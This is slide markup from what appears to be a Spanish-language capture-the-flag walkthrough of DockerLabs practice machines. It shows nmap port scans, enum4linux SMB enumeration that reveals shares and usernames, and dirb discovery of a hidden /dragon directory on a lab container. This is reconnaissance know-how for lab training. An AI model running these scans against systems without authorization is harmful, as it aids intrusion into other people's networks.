                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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sC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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-p22 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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vvv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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172.17.0.2</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
              <a:effectLst/>
              <a:highlight>
                <a:srgbClr val="C0C0C0"/>
              </a:highlight>
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202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/>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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El servicio asignado es el “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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”, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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OpenSSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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9.2p1.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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sudo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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sC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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-p80 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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vvv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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172.17.0.2</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
              <a:effectLst/>
              <a:highlight>
                <a:srgbClr val="C0C0C0"/>
              </a:highlight>
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202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>
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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Observamos que es un puerto con un servicio http, concretamente Apache </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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httpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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2.5.61</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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1400" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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ain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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-title “Juego de Tronos”, y que soporta solo GET ,POST ,OPTIONS ,HEAD.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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s-ES" sz="1400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>oporta descargar ficheros con GET; y POST solicita que el recurso de destino procese la representación incluida en la solicitud de acuerdo con la semántica específica del recurso.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p: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27A5389F-8C1D-4614-B347-C9F700EAF9D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503238" y="2418460"/>
            <a:ext cx="4754563" cy="311181"/>
          </a:xfr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19DAD17F-2717-4796-95C5-5599666BB5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4122" y="4069079"/>
            <a:ext cx="5172797" cy="905001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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A74E31BF-1374-4E3C-BAF6-C21CE151C4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BC4D70-09CE-4F0E-B2C6-906B4EBE3D77}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>19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237032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2843096A-8812-417C-9D24-5D6637ED8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b="1" dirty="0"/>
              <a:t>Instalación</a:t>
            </a:r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2B606699-9300-4A49-8EA5-542278DEA1F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s-ES" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0563C1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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https://dockerlabs.es/</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202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s-ES" sz="1600" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Montadas en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>dockers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>  Comparten el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>kernel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> del sistema operativo host (recursos), lo que los hace ligeros, rápidos y eficientes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Cada contenedor solo incluye la aplicación, las dependencias y las librerías necesarias.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> En este caso VM – Fácil: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Paradise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> En este caso VM – Fácil: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Winterfell</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Marcador de contenido 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B069B9B-AF42-4B1A-8634-ED35C2B87C3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267450" y="2671483"/>
            <a:ext cx="5245070" cy="2555570"/>
          </a:xfrm>
        </p:spPr>
      </p:pic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A5068651-D43C-4E5F-9337-8F6886DC1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BC4D70-09CE-4F0E-B2C6-906B4EBE3D77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415761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B070BD3-A289-4550-AF72-79D78231C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b="1" dirty="0"/>
              <a:t>Reconocimiento de Puertos:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0"/>
              <a:t>139/tcp,445/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" b="1" dirty="0" err="1"/>
              <a:t>tcp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04EDA7C-3C85-48E5-95F0-8C8162B9412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ES" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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sudo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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sC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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-p139,445 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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vvv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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172.17.0.2</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1800" b="1" dirty="0">
              <a:effectLst/>
              <a:highlight>
                <a:srgbClr val="C0C0C0"/>
              </a:highlight>
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202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ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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Los trataremos juntos debido a que los puertos TCP 139 y TCP 445 están relacionados porque ambos se utilizan para el protocolo SMB, que permite el uso compartido de archivos e impresoras en redes.</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1600" dirty="0">
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202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ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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En ambos casos es el servicio </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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netbios-ssn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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 concretamente el Samba </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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smbd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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4.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p: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F73318AF-54B9-436A-B5D1-73F64802603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769777" y="3487973"/>
            <a:ext cx="4248743" cy="581106"/>
          </a:xfrm>
        </p:spPr>
      </p:pic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D6F08C26-C4C1-48CF-BF3A-1BC50ACFA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BC4D70-09CE-4F0E-B2C6-906B4EBE3D77}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>20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092484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3B82A35-983C-4587-948B-91E9AEABFC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b="1" dirty="0"/>
              <a:t>Enumeración SMB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35D617B-61CF-4A5C-A98D-DE57A646E77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s-ES" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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enum4linux -a 172.17.0.2</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1600" b="1" i="1" dirty="0">
              <a:effectLst/>
              <a:highlight>
                <a:srgbClr val="C0C0C0"/>
              </a:highlight>
              <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202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s-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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Por un lado nos muestra que hay varios directorios encontrados compartidos; mientras </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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$ es para drivers de la impresora, IPC$ es del propio servicio para funcionar remoto.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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s-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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Nos centraremos en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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shared</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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que conlleva los propios archivos compartidos como su nombre indica.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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Por otra parte nos ha encontrado que podría haber reconocidos varios usuarios locales del sistema, tal como jon, aria o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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daenerys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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s-ES" dirty="0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B30F246D-7EE2-467F-9B50-6737B654CFC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358516" y="2502139"/>
            <a:ext cx="4754563" cy="1053434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B36A5F8F-490C-40CB-85BE-7ABA15C440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4122" y="3865582"/>
            <a:ext cx="5310076" cy="707197"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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C636DB2-AB9E-401A-B015-783EFABA47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BC4D70-09CE-4F0E-B2C6-906B4EBE3D77}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>21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639276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6CE35F-E0B2-437A-9016-0303AA200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b="1" dirty="0"/>
              <a:t>Enumeración HTTP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CF1BCFA-D0DD-41B4-BE6B-59876E6800E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25000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Accedemos a su página en el navegador; nos muestra lo que ya mencionamos; un protocolo http, con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-title llamado Juego de Tronos.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Descubrimos en el texto mostrado en pantalla, que hay un mensaje que llevar de parte de jon, transportado por </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>arya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> hacia </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" dirty="0" err="1">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>daenerys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" dirty="0">
                <a:latin typeface="Arial monospaced for SAP" panose="020B0609020202030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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http://172.17.0.2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ES" sz="6400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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Desde </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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dirb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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sobre la dirección web del target, nos localiza a través de su </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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wordlist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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por defecto.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="es-ES" sz="6400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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s-ES" sz="6400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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Un directorio no mostrado, llamado /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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dragon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="6400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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ES" sz="6400" b="1" i="1" dirty="0">
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="C0C0C0"/>
                </a:highlight>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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http://172.17.0.2/dragon/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s-ES" sz="1800" b="1" i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s-E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s-ES" dirty="0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CB5FD724-9281-4D8E-8F17-C410884B770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380063" y="1957540"/>
            <a:ext cx="3668937" cy="1868717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804C2D44-53CA-4C61-8200-37F5D3F127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1015" y="3966101"/>
            <a:ext cx="2247032" cy="2282299"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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89FB709-E69F-4101-91B7-C9C87D00A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BC4D70-09CE-4F0E-B2C6-906B4EBE3D77}" type="slidenum">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>22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575632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6CE35F-E0B2-437A-9016-0303AA200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b="1" dirty="0"/>
              <a:t>Enumeración HTTP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CF1BCFA-D0DD-41B4-BE6B-59876E6800E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ES" sz="1600" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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Procedemos a intentar explorarlo, nos muestra un archivo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Arial monospaced for SAP" panose="020B06090202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txt</a:t>
